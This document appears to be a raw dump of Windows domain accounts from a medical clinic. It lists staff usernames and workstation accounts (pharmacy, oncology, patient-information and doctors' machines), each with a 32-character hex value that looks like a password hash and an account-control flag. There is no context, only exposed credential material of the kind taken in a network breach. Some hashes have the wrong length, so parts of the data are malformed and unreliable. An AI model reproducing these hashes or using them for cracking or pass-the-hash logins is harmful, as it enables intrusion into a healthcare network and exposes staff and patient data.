1465 nanderson 2b8efcb05bd8426f5338f6a06b7f7f09 512
1463 lniesche 4ed7184a5b83f2de1ec6d23237497c0e 512
1462 dgrefe 3cad0e0f95ca6d0c60989955d794b6b1 512
1464 bzimmel f85ebe09110f73f149a7ba58be020591 512
1130 blnurse 78001de4cfef2bf1afcdb3c2a6efffd 544
1460 bwoessner 702f70098a144bfb7c7a1457556ed95c 514
1684 aprilvculek aed6234fbf01c56c16a2521831bc6e5a 512
2148 BLCTRANS05$ 68f3358b0d47feac2942b9ff49d1b312 4096
2142 BLCNURSE02$ 5547023037dc738d985c9901a5129152 4096
2151 BLCNURSE01$ 79e1363d6878871bbe36632c664f6d4a 4096
1675 IT02$ 8b4694da4e512c09194020f90701b1e6 4096
1474 WRCRECEPTION$ f868dad2f1096572c522e56ff51c575c 4096
2197 WHTRECEPTION01$ a6bb50d21fb70416b20c68717be9d02e 4096
1711 PHARMACY01$ 9bee950ff25ec085153753ea621f8b27a 4096
1570 DRVANVALKENBURG$ 9004b38c8a78c88980669b327d260436 4096
1630 DR-TOMB$ f99781df952704f664d7df5bfb929db5 4096
1772 DR-TATE$ 98a40706e695660266392c0e9dce074d 4096
2149 DR-SWENSON$ 952d302fc8aed0b6f8a825afd063705f 4096
2169 DRNORGARD-MAC$ 541b638eeb32bd344a2f4ac2f0b55d 4096
1319 DR-KOWITZ$ 3dc71cd69625a6bdee71a1fe60404245 4096
1315 DR-KALIHER$ 1d8645068fdeea15c73337c6a43be9e7 4096
2138 DRHENDELBL$ 72252fe5b2ad55cc2e608665b086eb7c 4096
1324 PLINDHOLM$ 77cdaa15e267709c302069e9a86e7869 4096
1471 sspilde 3204577732a9532bd95dcbb0539486a0 512
1469 joachs 301a1168cc69d2a4255e44e8881c7310 512
1470 ahansen 43fc73d691784a72ceaa65d9606f3592 512
1396 whtreception 9380147741154115433e6bda9436212b0e52 66048
1450 front d2a7d55bfa7a7183e69d69dfeceeda41 66048
1346 VERNON1$ 9bf548fdc3e20e1748140fa106ca4361 4096
2159 ONCOLOGY02$ 523fa53bf9e60b3445a2b0f8a39788a6 4096
1410 dschultz 8da5df4b55e013803ab1be9847bd4bc 512
1305 PATIENTINFO01$ 3594c1d47c352dfac0a77eb9465ed4be 4096
1304 PATIENTINFO03$ 83b8caa3964b05711b29951e497f46ac 4096
1803 stephanidyrhaug 38acbd84c347890bddb0b67ced9872c9 512
2170 REGPATINFO01$ f3db83ea90ce03c9d59f18b7d98e790b 4096
1536 CASHIER02$ c5ef9a634b52c1196ac1608b33862680 4098
2182 PATIENTINFO02$ c079c13edc63f38d43ff3ef83382236a 4098
2110 REGISTRATION01$ 3d7e32302558c0c4ba80e9dbaed449f5 4098
2111 CASHIER01$ 22c913392d573561c7009cc5a129fb60 4098
1374 REGISTRATION02$ 16db1ca289846dbf02ee9609c9d28a27 4098
1459 knelson 4f019a0452ee8e4a676f274fc355f954 512
2181 INSURANCE11$ f47c2c8290c79639f9710478d295587e 4096
1309 UROLOGY01$ e5b6b52c13493ae4dbdc30ddf6f51368 4096
2139 BLCRECEPTION$ 156c1ba2d682dd3d0081880e3d07b03d 4096
1211 gmathison 59cf57821c7934a345404fc8e43fcf7c 544
1394 meolson e3bdc12145b172b358940a203285570f 512
1359 ONCOLOGY01$ 331da257042cf50b8184e74c9715e8 4096
1283 kgullickson$ 66d364525032a0af2ce6ddff7608fb50 66080
1577 DR-UROLOGY$ 111e437573a1c0757e0ade030969aeb4 4096
1793 cynthiaknutson$ ba63c041662150375c627d163df382e9 66048
1799 ADMIN16$ 3b015d3d7bc1fb7f6b63ae4aa801fe1f 4098
1524 lisajohnson 77120a4a97532a21b5018f6abc150e2a 512
1492 snjos 952049408e1609b06c686c17cb85e36d 512
1567 DRVENNERSTROM$ 1bfa12f14519c91c1220e63d392fb5f5 4096
2116 PATIENTACCTS03$ 8b4b7896a8e0e190b49439d18c735352 4096
1150 jgeary f045401a5e4c75dbbe4c3b7d04de4628 544
1133 cnyberg fa82f78268095544cc4d907b7def29f1 544
1627 DR-LOKKEN$ 3b4cf9dc445a87cd539cec25725f5f08 4096
1744 fadelnammour 088b8ec27bc87547ea243690958e3ac6 512
1652 kimberlylarson 5de62f77575690f8153c9501032fc13c 512
1599 AntekBackup 105f046b8599099f367f272be28e43a4 66048
1430 INSURANCE04$ 80bf6833bd5638da8fc8d03ec2fb548c 4096
1700 aslee 0679c2a1910ce60218bba46f9b40b199 66048
1262 bmoney 7c2caf0670958ed23d938b31370f3ec5 66080
1432 PATIENTACCTS05$ 1d00af409631d12994167ef90778827f 4096
1835 mlwalvatne 88cb33147a81b3a953cd3ec488659e13 66048
1452 landerson 7a78e93cd40ffafab3827b8c26710471 66048
1451 WRC01$ 80227b83e88dcdae99f92f2f9c4b1ae0 4096
1380 hmfranklin 9610a5bd075e949b52b1fc09fb8990d9 66048
1636 dennisamundson 7f5fe8d956c5f007d34ae1dd522f06b7 512
2185 DLEMBCKE$ 27b3206db0f71451ac66fbf6409629a76 4096
1458 kleahy a1232ecb9b9e514d01cc4145e784bed4 512
2632 WRCLAB$ c55a0201fd6a6f9d8a59133edd87e375 4096
1449 back 78daf3c73c9a4aeac54ac63e56d94a59 66048
2107 FAMMEDAPPT01$ 1eea9adf3e89dd1f975ac6c1a4c6eb8f 4096
1388 mjohnson 791ef17fbef4082b078d3370c3e38ffc 512
1764 alisonnyberg 036d108a06213115050eec957305993e 512
1311 PSYCH01$ 0560f82387bb2e3cc2b0aa7ae3f7af6e 4096
1678 kathleenotte 654f2a78ba47d681510bb83c1929692a 512
1841 rlfjestad 8658e527137be2043bef77b1f109717f 66048
1842 jljerger d72bf765ff46c10a813d81509e976d99 66048
1843 kaspanswick 66ca5d9051d246da0095f9b4438abca4 66048
1845 aklarson 375faab26efb75ee4acb667202b530a8 66048
2188 UROLOGY02$ 1265e6ef43e1fb3a0b6acec8cb8d4535 4096
1788 stacywilde $7105ac60400f33e1a1fd33515a201e32 512
2150 MAINTENANCE$ 210fb141b751c90ab1732e8ab100ea50 4096
1682 ADMIN12$ cb9d235c6738afb2e1d085ec19a243a0 4098
1334 IUSR_CLINIC c6fa98673090d4b7e1d5afb35e9bee8d 66080
1822 larandadrechsel fe33f0e2f0dea6137c269af5bdb8471e 512
1427 dcavazos eac9df0d9f41f7a5c8b54b2df6d0033b 512
2140 INTERNALMED91$ 0a60ac715991b17cb43f7ef90b83343b 4096
2633 arquispe 1f1f42fa606ef8651fa159af91410632 66048
1494 troers f6e3d88419421ff66c998f847ce10122 512
1354 INSURANCE09$ da29f0e0c41ed98c6974c192e77455d9 4096
1523 jerimitchell a49567804cf6c815185339671d65fbb2 512
1522 JERIMITCHELL$ 37eecd83535b58b58e8954d53f602682 4096
1128 bpetersen c1528d77dab8f3314e34945e2a721661 66080
1226 lroehl cc3539f01f68edcf34511c40a5fd56c7 544
1337 ORTHO01OLD$ 8fe2067e26962a88a041b2cffe983c90 4096
1433 PATIENTACCTS04$ 8bd0fcfcf11735a798af4bc21aaf0e4f 4096
1431 PATIENTACCTS01$ 19ce274cf766487cd70249becde7c895 4096
1566 robertvennerstrom 9f184706e86e497fcbb3e9ba4768914d 512
1313 PATIENTACCOUNTS$ 747d92bb686ef860aca8b48a022b2cfa 4096
1837 mlohren 34d77bde8b4e251be614b7915a632a8b 66048
1227 lobowa af1766a8045f8b8b14e34927e05f21560e 544
1249 jandrews 8a20c0bb05fc9cca4996a9fd5ff72476 544
2141 DR-HORAK$ 71390b7c47471298bec922208ae47ab1 4096
2203 cmjorud 74cb2e5e4ba7b180260a1c839c9ae69b 66048
2204 arbranstad 2d9e0d2b6fef04bba4a3daab32e4232d 66048
1529 jhorak 71e77db8a282c6c55d44abb6f9c0a054 66048
1698 drmahale f39f527fb825f6ea3c93e9b0c2d7bc9f 512
1466 kbjohnson c1a593239afbce6cfe1d806758533ea9 512
1519 cherylmostue 0dbcfe529e464fd8f767eb082b2dd424 66048
1512 loiskelm 8f37fd56564f1ec544e6b2f2948bfb41 512
1737 DR-MATHISON$ 89ddc588738d1540ec04cdbbc98c1417 4096
1231 dtbjork 46045df676465a5b2b8bf98e4615bacd 66080
2200 DR-SAMSON$ c5a616473f89642e2eb85e1556670cc7 4096
1634 WRC-DR$ 2a88b22201be0af7731f2d61edf4ec83 4096
2634 reringdahl d9a475be75065aae9e07e91ed2dfba4c 66048
1610 gwennordahl ac560e65500eb28945e5fe709a61039 512
2115 PATIENTACCTS02$ bea9eeb03c24458963bd882fc007e3f6 4096
2637 saolson a3174064e5df297ceaebaf4682a611ef 66048
1663 ADMIN11$ 5b8a979bb35799f2ffcb94e602765e08 4098
1838 kacarlsrud 69902cbb1f0753b0dd420ffe93d8c37f 66048
1357 PREREG05OLD$ 7a3ce4d803bb2ceb3e62be05077864d4 4096
1530 MEDTRANSMARILYN$ 79cbe72f19fa06d3615b5eb1d7c265fc 4096
1765 jodischmidt e638115d1bed2f4559e2724bf718c68c 512
1761 hmswenson 43bbea9c86860260bb062a7afb02f83d 66048
1306 PREREG02$ d2d251565b2617af100e3a42da1a60d6 4098
2120 BLCGWENNORDAHL$ 34fba012fac91c67b0abc6c83a2ef533 4096
1804 DR-BJORK$ bd991b081aa200289f265bf24c9f0296 4096
1511 carolynanderson $6e973177c2119f032711f9e1bb63c2ac 512
1514 maryannkugler 47db18043c3cfc26460098b23f9aac 66048
1467 clpahl b788d93e4ea6359d732a376c493fff8b 66048
2641 jphagen d8b2054e1b81a0ebf9680d7b2539a358 66048
2642 hmfoley 6408b8bbd9f73d3ce22b478957656334 66048
2643 cknelson 2ff9219189803bfacaa6ab5b16a7cebd 66048
2644 eboen 8e7459e6b38a6715c7537f8cd4cfcbb7 66048
1606 jemarquardt 98685dd2bf78647d14f0db5d9a4a9f84 66048
2645 kssem 646a976226faac0916e9789af9692bfd6 66048
2646 tmtarpley d9098a0547c911f6704df1f1fef9948b 66048
2647 trmurdock 84aeec4981e5a5d26cf316ae0647b152 66048
1453 mmmatthys 51b0b7d25592ab1612fb2e8479548daf 66048
1378 PREREG01$ 22cbbbe74aea12d6f5553946c7ed40e8 4098
1323 FAMILYMED02$ 90796bd8f3c6ca9e165bfb39fb82529e 4096
1393 mhaugen 14e6dcdaf76ac00823d3131a20034a35 512
1142 aevavold ecc56abc4486fbce0cbca1ef10c0a2bf 544
1557 kimborgos 9b71edf13ad0572d0c45e39996c93691 512
1328 PEDS01$ 2eac3f966ce03b9b84420da1eb988bea 4096
2196 ADMIN14$ cadaa67d74a5b10475a162883626eac5 4096
1797 mattflugstad 7b4f904f0a3767eab8f4dc0dcb83c783 512
1508 djboese 7c816d1b1d7332cb1006e75c6696ca95 66048
1832 enevavold b49f724ceb4bf0bfcac2e9e5b9af0390 66048
1597 TEMP01$ e27d80ce8f486f6ea70f7b2dec573f58 4096
2649 slaune 817a0349953470719e5c71ab0ba9718a 66048
2650 djcollins ce2867a41e585b0e419da424decc95ce 66048
1628 ericlokken debe275316ec95f77673a7094ce789d8 512
1836 emklemm aac1bffec43a308fe420edf27c34c086 66048
1180 sschlueter 3393f3a49a6a3c2a8233e7a29a7e8571 544
1539 FAMILYMED04$ 1fc8312cb97eed635566c595c3360053 4096
1207 dlembcke 9755affbd969d8b64821225cee8105e5 544
1322 FAMILYMED01$ 14ab3166a00551358504f0517044ec8b 4096
2163 DATAENTRY09$ 289d62338eb611b822bf50f32821bb5b 4096
1561 karaaxell b6585b2e5e494d90459e8b49a734318b 512
1330 OB01$ ed27abc006be74f70ca88bcc27d1341f 4096
2165 DR-FAMILYMED$ 87c2d0337a01fca5231b698daf9dcd81 4096
1141 dmoe d8a0a68924b7b8dad11e0940ee72a147 544
1191 cmindermann ddc0d48f1a551ff6d363075da87156d5 544
1600 OB02$ d37146eb251f844c54a15e8ef69e41d8 4096
1333 SURGERY01$ c333dccc03ac0f9533ff5c79203cc79d 4096
2176 MEDTRANS16$ 424628c70a696f86d3aaf053ac6c8514 4098
1551 cnlokhorst 6d019eb15ca3c7ee90b7f7793b78e036 66048
1149 jrhendel b71d24640b20a6dbc37be7d53e2ee467 66080
1213 pshol 8a94d4f8364a148658655222831e3024 544
1601 missyhalvorson fca4c011f682f0f3fa4f6d3a04ee4426 512
1318 PATIENTCARE01OL$ 884dc98711f6e32e2efc3d25ff26258a 4096
1456 smswiontek 229e88beb6ae9bea431e24279dbd2daa 66048
1225 amlewis 023785652249a821b0b9e45265c65fd5 544
1553 susanwoessner 7d769604287a3dc5fc34a4f622b791ee 512
2651 slpletcher 124513c6c851a7e030e4195ee096167b 66048
1174 rteberg 2536ca3621d2a556a95b90277c603478 544
1510 sbjohnson dee6f3cba2dc8623865d96f715edf5c6 66048
1228 bmharrington 8556eb9ac049c9da0a58aeefc33fe26 66080
2153 MEDTRANS19$ fe3ee30a000b50bffbc551f8d672bf36 4096
1569 llsternberg 3bfec37541454590f097d224fefad535d2 66048
1123 asievert 71a2ea36e010c680ca56837dca89cf98 544
1312 TEMP04$ c777984d36ec8bee411df0fd496ddb4b 4096
1397 CODING01$ dd54b460f0bc621d3c01ecb5c6c8b30d 4096
1623 dlhieronimus ab9ba244b8d32985f2a8e20af5febee4 66048
1593 ADMIN06$ 76ac5778c8cb4ba5db24a48946ba7c99 4096
1156 jhanson 3117b575da28313397c9f07fe0788161 544
1392 drobb fd5187235a3ea7cd03de399a0c7e60f7 512
2652 training1 5b4c6335673a75f13ed948e848f00840 66048
2653 training2 5b4c6335673a75f13ed948e848f00840 66048
1290 MEDICALTRANS12$ 7853157b9b745d070feae60b214d053a 4098
1218 slsem 5d018a45a9eb0473f3c3cd3718de6c3b 66080
1379 dblondeau 547cfb1788a7d82432937554ea25ee409 514
2639 jalaplante cbf9e0b72739278db0f82dee1fcea78d 66048
1669 DR-THOM$ 73814287ed9b1c974831be868b465292 4096
1667 drthom ce19b3c08eefb3c70f7ff8d635bca0ee 66048
1829 haottenbacher e957cf961db72e8b18461f42b32b8307 66048
1198 cstigen 5654690ff05f50725ceec956aff0368b 66080
2109 SURGENTONC01$ 2f034c2a1f40cfeb511d10e606ce37ef 4096
1776 tonyahaugen 48deb295316d246d254b26b4e92dda03 512
1429 INSURANCE03$ 74f59bf10ce03689e0712b4273ec0f1d 4096
1535 FAMILYMED03$ fe0710502a956e92384e7d9a7c8889e7 4096
1612 angelabradsteen dd410cd895b93b3934776adb54edba62 512
1367 WRCTRAN1$ f3c39d4c526c5538af06ee21a76e9200 4096
1167 molson 411ae78b736d4129ac0a703057740c47 544
1224 cljohnson 7e9bfc1129b337bdb60d0cb5be4247fc 546
1828 cleverding 3d2bf9da6ada0a0a4b3b3d46e9fe534a 66048
1134 cherylbarry c1dcee10f37da0dea2cce60897c2321a 544
1687 MEDTRANS25$ 5dca8d270c6882f44e9dd649f25f629d 4096
1178 scarter 00d89524084a96eaac5c40f51dfdf366 544
1176 sscott e278c482037f529bce78ceae66682bb6 544
1753 rachelvoll c9e4848f8e5f27b8b032574ba8b7749a 512
1502 vrode a4e86f232d9fcb641f74d5b9ff6f174c 66048
3106 klkeller 80c8b29db94ed0b30dcd438dfae41a50 66048
3107 nrweisenberger c5e0feb26fdbf60ea0e03383a29325bf 66048
3108 mmseidel ba4abe889054e18290060d89f206ae48 66048
1473 jdevries c4177c274066c380d41139e9d1fca44f 512
1683 FAMILYMED-NP$ 66901cbb214faa25bcfc5e7e8b204b93 4096
1402 medicaltrans2 f4332692c33d971140c51f1c13bea277 512
1152 jhammerot ddefb7e3b9fded75097dca0a01550e86 544
1159 lstrand 70fde05069984a79d00b146770495ee1 544
1370 whtnurse 9380147741154115433e6bda9436212b0e52 66048
1525 amasterman 723faab47a59cdf95f2d127b7a246477 512
1649 MEDTRANS23$ ed6eba734e562e8acf46cba80043e9e9 4098
1653 FAMILYMED05$ 992813fbd886480d285796002a5968d8 4096
1398 FAMMEDAPPT02$ c4d54a40e9d2589f3528639a1f3c1d81 4096
1442 cernerftp 45a3cb1686cf73e75de4575d13851ab0 66048
1826 crcolosky edebf24db8fd09f1a0f968a391cef2fc 66048
1564 karinelson 658969fcace05a933cbee707c4eef749 512
1773 djwest 20e57fe5249b0fdfbf6eae26e3b22339 66048
1701 DRLINDHOLM$ 965cc24ca05d1a94a37f22bf673c0a1b 4096
2198 DRKALIHER$ f4c0534510ae4428c775bdce52807c8e 4096
2187 BLNURSE01$ d36c9badcec99ad637ca21c1d0bebd40 4096
2183 WCHCNURSE01$ f471524d13af418c236669dd385cb574 4096
1579 INTERNALMED13$ bf26dcea9711e5d0caf310bddd1aeade 4096
1468 lnwohlenhaus e43f35677cec0cd6fbdd26f5f3d35722 66048
1548 joanneness 7eff3a0679e8f5f2eb76b153a9f29bc2 512
1282 jkaliher c59508253f1ba8a772ea7b39cabcf7dd 544
1547 cfvorland e8254befc20061f88fa9f42a41e0c8dd 66048
1588 INTERNALMED05$ 74dfc491aa9f632ae983e77a0ee992d6 4098
1434 CODING03$ 58dcbcae8d1e316e2bc1ec4775b14fc3 4098
1782 WCHCREC01$ e613f09276cef85f7dcad726d3cb0626 4098
1706 BLNURSE02$ 5c9fcf92a716ad5b280dd40e5c224ec5 4096
2166 INTERNALMED04$ 1772fedc1c75ddb0f732f6d82ec7542c 4098
1563 marciadillon 1ff36f57aff1d5db8800d2c785a0cae0 512
1314 EYECLINIC03$ f5e575e5035047984bd3ae88b1bb842a 4096
1281 plindholm$ c075a7246f4c8bef9d38a2d3a133bc2f 544
1629 DR-TONG$ ce9517b78f3c0d9af31f8db61b195c67 4096
1620 gjtong a5b7100b4aa7f8e93071be40f23b82b2 514
1713 PSYCH02$ 63cb7ec250904af4b7c8061f4b54f278 4098
1552 pltell 36c71052cc9f3df09b42f66f537ce603 66048
2144 ANDREWS$ 11acd59c59fc6defa1a51bf3fe0881f8 4098
1527 kevinshaikoski 172a3e327f8b438e17bf91c54c2f252d 514
1766 rebekahgraffunder 822ad3ce5ecce942944613d290a1f1 514
1454 dakempkes 7c36ee96da103a81763531f2ef613191 66050
1516 aprilklimp 6290bfeea1c751208379cee5ed256ead 66050
1743 loricodner e0173ccd6386a350351f9d52ee6c100d 514
1560 naomiolson da93b661760477edfc6ed312f935556e 514
3110 jllankow 2a45242c15f59e6db3c6fbd5da7e683b 66048
1544 ambest 4edc397bd51b40cbfb2596541127d304 66048
1545 machelleellingson ee75c6d3c79105d330c2bd99d5f16c13 512
1384 bness 44794d58c8ad82bd1b84d49ad357baa2 512
3105 INTERNALMED01$ b0dfb253773c6ddf3ec25a73411e47ea 4098
2191 UROLOGY03$ 44057957cb485b4ddc9b8cae7fcc1c0 4098
2164 INTERNALMED02$ 4b93eda1b8da8ddc653949f46724ccdf 4098
1144 hschwartz 0af153b7782e2bef7f22fe8701ff2127 544
1721 denellelshaug 6e00fa5bac85e2eb7d33137f568617f9 512
1695 pstoy 6f4f88cf36cefc95fd15f8050e443622 512
1385 mmoen 7e22d1e711e2bfcb3b2c539cde161983 512
2194 IT04$ c8ee40eba7ecec79acd94a7d0d3f18ea 4096
1147 jehlert 8c5be24a23f8376dc130a24f1579b6f3 544
1399 INTMEDAPPT01$ 7bb7aadf3d2b40e5f2223f4ae0801b29 4098
1840 evencmmr 82a26287c079231373962613246069c7 66048
1400 INTMEDAPPT02$ 1353ed719c6e123bea73764629151539 4098
2648 jmrolfes b5a5c6224f40840258f1bbd5d4b60fbb 66048
1490 dmschneider a15d8bcc287f442cfc33c52526ab0686 512
2157 INTMEDAPPT03$ 3d5b526687817f7f49cd290eeb54964d 4098
1194 chendrickson 99878c755fb267a08fe660dd78a42acd 544
1316 EYECLINIC01$ d4482fd2e501d0f9fed861b8a44606817 4096
2147 CREDENTIALING01$ 296a4b084c43dc8ce62f92e547a95827 4096
1541 jillbrethorst b72eb474b1a81360edce11f955161bce 512
1161 lveitenheimer a80c3b05e0ccda6f83b2cb351ac4e1ae 544
1699 DR-STOY$ a8fe39e3e13ddd6a2ba2f1f05d23b19e0 4096
1808 nSpire Health 18ed4f4a43886dd171e7ab736541d76e 66048
1703 DR-GUNDERSEN$ 3bcc9a3d703dc8dbb67b4d3f33f47f3d 4096
1702 markgundersen 13490c009d26bcb6d231f1316ce062b1 512
1604 janicespies 542194ccf81d43b11bbae6a7f4c9aef9 66048
1692 mattmouser b56354d9266cba25422ab15e8547bcf5 512
1805 PULMONARYFUNCTI$ b4ac4781048ae6bc156b35374c720236 4096
1691 DR-MOUSER$ 74904c49f700c9e15f16d00a98554379 4096
2192 WCHCDR01$ b5b287ce3c338de11db07f943c7f6f53 4096
1395 sgallagher a0739df192b64e0aeca567856e913705 66048
3112 aeroberts 13036200cef18a0854f1dd70cc88c584 66048
1677 NURSINGSVC02$ 700b442ec8d3c24b15e0f0176910aad8 4098
1676 NURSINGSVC01$ d6b73ca78b54798073325bdea19cee3e 4098
2152 MEDTRANS13$ 5d0f76df54a3dbed955fcea211f5f0fb 4096
1655 leannrogness 5f8067b5789c266da48ba92406cc5294 512
1631 kathystaples 5f0d75e121e61086b26b54f7eb9f20b8 512
1166 mtonneson 4de8a532a09d5b9eb19e07b89a49b115 544
3114 mebruininga 12050de9174a28b116fd22989bde2b10 66048
3115 vfuhren 2bbac362a13887c361297c7162bb9db8 66048
3117 kagraff 2044f66498f0c00f498578399f0321a0 66048
3116 krcave 5dfd676a553b492038ec102aa87c6881 66048
1632 EKG01$ 5bdbe0a1bcbb964a45580e623a35a2d5 4098
1639 EKG02$ 048090faec12de815a1f6eaf1bd8bb6a 4098
1160 lakress e0f69fcbdc87a5416eb39b3bd8d854a0 544
1499 MEDTRANS15$ 6cc1aa413d4a07964f07cb8076c3bdbc 4096
1644 COUMADIN01$ 5aea7c089660ac3160589fdc725a131b 4098
1594 jillhaarstad dc4ad240083c4b5e225d663f665df425 512
2156 ASHBY01$ 2daa327a11da7616e6a003c37b068393 4098
2121 CODING08$ b38d8949a9780a8200accd4bdd31946c 4096
2199 ADMIN17$ 968c5bbe05450a1d3edc5cfb9023a3da 4096
1422 jgregor 9d8675b2b751eb80f9e7dd44ae20c804 512
1732 ADMIN13$ 430ff2671e737ebd75cd281de29e3951 4096
1491 amyeggen 14437b13fa716df7f0e4946d40e76e4 512
3113 klpetersen b2b1ec98869242a0bf4679c26e2423d4 66048
3118 tmumlauf aa09adad01510f97e46b6c4bd2b69d05 66048
1696 kirstenkragness 3e0841fed5cc10c48ab3ce07bfe3f8b5 512
2127 MEDTRANS14$ 31ad33f98e82e243e3b3cf4ee987d7a0 4096
1792 mariebraaten 638ec491ee8c4e668300716fa5b5413a 512
1794 MARIEBRAATEN$ 158b0ed3305ce77d6b730455f4ac710 4098
1185 tkingston a4d9ff4db31b133550e1c7edaad3a512 544
1157 kolson 39efab3df60b62e4ffad0fc3b9e0870d 544
1622 TEMP03$ 97ac7fb1237e7f6e0bd92fde0187c4ff 4098
2172 TRAINING20$ da302136f0b1541ecef05186d67853b1 4098
2179 MEDTRANS31$ 559e1cb97968f19c7b79b3a85b463148 4098
1626 sknohre 7046e2789522b425e06c93a2c948630f 66048
1177 sjurgens 3d0eea1cfc5228ec422bdb14b6f405c3 544
2118 EYECLINIC05$ 3c5e9b307d98163b0f1cae00271dc08f 4096
2117 EYECLINIC04$ 5ee1856892069fc5432be1cc485306be 4096
2113 INSURANCE02$ 05081de692e8edf7dbc363b7cac4f982 4096
1501 PATIENTCARE03$ e6eae8c4cb8808079dfafe61b5352887a2 4096
1373 APPTPOOL2$ 3472ed81cd705d6f69d60413888bf100 4098
1375 APPTPOOL4$ 15c9d9f93e25839c80701535afb06a5d 4098
1376 APPTPOOL5$ 5b70cb98e678198f1209b5f8d141af34 4098
1172 pbutcher 62de4b93217ca34b98914535c6e90ee4 544
1372 APPTPOOL1$ af0ee09d232222ad1f2fdf0998946ad73d 4098
2112 APPTPOOL3$ dd85150ecdfae3d23b8f084d7f40bc00 4098
1390 jnelson 9b83e29ef8dde235ec54f98d1beffd01 512
1136 cahayden a0ceddbb1aa337c1af6b4d94e28ba584 544
1538 ENT01A$ a7205703cee8c8cdaf43a0e2a2f46268 4096
1645 wbellman 386d36464667d804aee10c6b8c561bba 66048
1790 MEDTRANS32$ 7dad9afd22753dbefe92c9c26eedafc0 4098
1784 susanmeland f0c5893d75e69a7f7fa768c660d54a55 512
1751 cathefinkelson d9adb2f60146b347249ee9c72b32e168 512
1783 DR-MELAND$ 090b63798080dd2011c08f10eb74c2af55 4098
1423 bonken 1455893cf488171aac6bdf8f38806f02 512
2119 CODING02$ f5ae2004ffb0189f43a20c40101f09de 4098
2122 CODING09$ e48d5d0cbfdada49caf240f967780290 4098
1437 CODING06$ 3c92e31422e99914a62d1ef17c7e9079 4098
1770 acrobatrunner b35c2063adb8a54b6c5311252233ba35 66048
1421 kldolan 70df97f613652cfbf1b71477729acac3 66048
1435 CODING04$ 60dedcde71c812ce6780560fd69e6542 4098
1642 danderson 57221216bd45b5dfe4a25b4d153f8b7f 66048
1424 jsonmor 23ae3d1dc042d46e3d48bcffa6135611 512
3119 jlknudson 6c1d6e6f39f347c9fe477848cca619b0 66048
1386 dweber e7d216ef2034254bccb3be5aaac569fb 512
1731 luellawilde b741cc9db976bd18d8f1b91310a630c8 512
1403 SURGENTAPPT02$ 2a15b5a7c43cc916e6abbdda0cf62d3e 4096
1724 MEDRECORDS12$ 9f26b4e815a8ce8009dea4920d6cddfc 4096
1500 CODING10$ 4d43fc92304d6ce3c2ae8abbcd2b82f6 4098
1436 CODING05$ 96d93098e5e4fd1cedf32bc5e507c721 4098
1497 thurley bdcb6ed5aaf69ecf3caaf6ded34ed187 512
1317 PATIENTCARE02$ 013ccea833864184915572aea6365f3e 4096
1831 camavis 90f90b95d77ecb3778195ca19b9563ea 66048
1146 jashaikoski 8384445ee87621f5ec558039a4631833 66080
1720 maryabel 46367430424fbf5c2fd1adfd380c9e81 512
1605 fayeluedtke 70febca3d46411d71e9f50e49f9a182d 512
1485 kthompson 5fe0547692cbee29eb92f4b698c9fa28 512
1364 ENG01$ 9df2339a964df1a4e0d85d2ca6d8d4a4 4098
1693 lindazumwalde e0310fc15582693dba137f3e93c155ca 512
1712 MEDRECORDS06$ f372076b23c85f422c35f47616176c86 4098
2189 MEDRECORDS08$ 6df2272cb95f3f6af051b7737bea9eac 4098
1718 MEDRECORDS10$ 3252dda8926954e94867f55a7e7d8d9d 4098
1503 MEDRECORDS05$ 6ca331809512429a2b9edd3f9cf9c407f 4098
1299 MEDRECORDS01$ 4d709f5e955d8e32174979ba2b1f5cd2 4098
1192 gsmith 05f6a65ad9c1fb1c9abf6899ac55a7d8 544
1165 medrechsel 79d4f47bd7b89fa72e6b9f0719fd6ac9 66080
1722 carmenharthun c4de1a0ae7f923d7861b1bed5d2019e9 512
1762 ADMINLAB$ 621078dec419cc0153ec2ea362014893 4098
1725 IT03$ 50edfa32dcce01dbce63fc9e449c9557 4098
2180 LAB-CE$ 7c23bff5b540f96e98adef97ad3d863bf 4098
1277 tbeckman 64fcf9524a8d61554c06b754fe1dadbd 544
1428 DATAENTRY03$ 89017be548f1b27c632bbe4b8e821b06 4098
1349 SUPPLY01$ c52c16282789ab761cd4ea92b1c05209 4098
1736 paristurchin 336939d0398c5016ce01ad37d23489d0 512
1680 michaelstreeter af75fd1d30727b604e54cb0404b9aa73 512
1348 SUPPLY02$ bf38f8f55f5518ef5cedf5d5e8870606227 4098
1830 kmtripp 9b2c87cfc4d6968b0ed10630b6138a80 66048
2205 MEDRECORDS09$ b495b0e02995c7160a4d3776173696b7 4098
1138 dbickett 919673f08ba0c45e38f9ba80a6cf6743 544
2206 HIS02$ aaadb45ca5308c8b2dc85ab2ca9f88fd 4098
1759 jlthunselle e4c329e69525291304a7d2807c89477b 66048
2154 MEDTRANS18$ 37943d911273289823301046e409270e 4096
1484 ce 16a0d9d05151fbec94d639acd77de80f 512
1162 lmartinson 828c06926dd7bf768f221da9536d81e6 544
1734 dantraiser 6f8b963b591710020e97282122d76d6d 512
1733 DR-TRAISER$ bc9a39b235088b15aed358218054ffb4 4098
1155 jteberg 285be705f27066ffeb749df472526c40 544
1834 DATAENTRY05$ 5ce664f9069ad66cfe028c8006263b86 4098
1752 daynaerlandson d04abeb82271f38086e50647d70fa40c 512
1294 MEDTRANS08$ b48bd52d07c6dd1c034dcd948d45cf2f 4098
1709 larryeisinger 26c5286aad4cc5a67d6c1b498ba66878 512
1686 markiekolle 018f65735e1074613ff794f9b92e7b02 512
1707 DR-EISINGER$ 1943833f411bc4b3a51ae287cbacec4f 4098
1122 avolden$ 298fb92a616f5da3eb1864e5d735752b 544
1689 MEDTRANS26$ e0ed30831a40022ba6c8a732e77a0a46 4098
1124 abratvold 5a5f7930e60d529ec0bb0a8879c6eee1 544
1587 DATAENTRY06$ 6a281a5c3158a4a3576100009ba280fa 4096
1276 jrandklev$ 2434fbe3038f32d0d1544013f0844afe 544
1302 HIS01$ 720e44a6eb61ea47d68cc27f40d6177c 4098
1581 delreynolds e4778cc4b69b5fc1eae8aa49eb804639 66048
1401 rerickson 401d242537a8f35c06b50019a44791f9 512
1730 ksdenker 2d782825f402ebf523ce5422c31a5227 512
1774 ADMIN15$ ebc356bc3ea81b6273c92586bf76561c 4098
1131 blaplante 8b724fbf190e7209879b9a1b89718dc9 544
2186 MEDTRANS29$ c08b9170bfb281c2d35b1228f395e8d0 4098
1382 sltripp 66542a4a152b38d00dd42533f8953770 66048
2195 MEDRECORDS14$ 4905614a001a41b372a881c9f76cc026 4098
1641 MEDTRANS21$ d849917f9b96d5810b6e027c485e5c90 4098
1708 eawilliams 36f8dee2ff0c6e543fd59c047f67c8d2 512
1714 DR-WILLIAMS$ 359792954bf28f2d0836c7967b256b4b 4098
1717 kayhutmaker$ 104a6f91703ac0329a712517baffa744 512
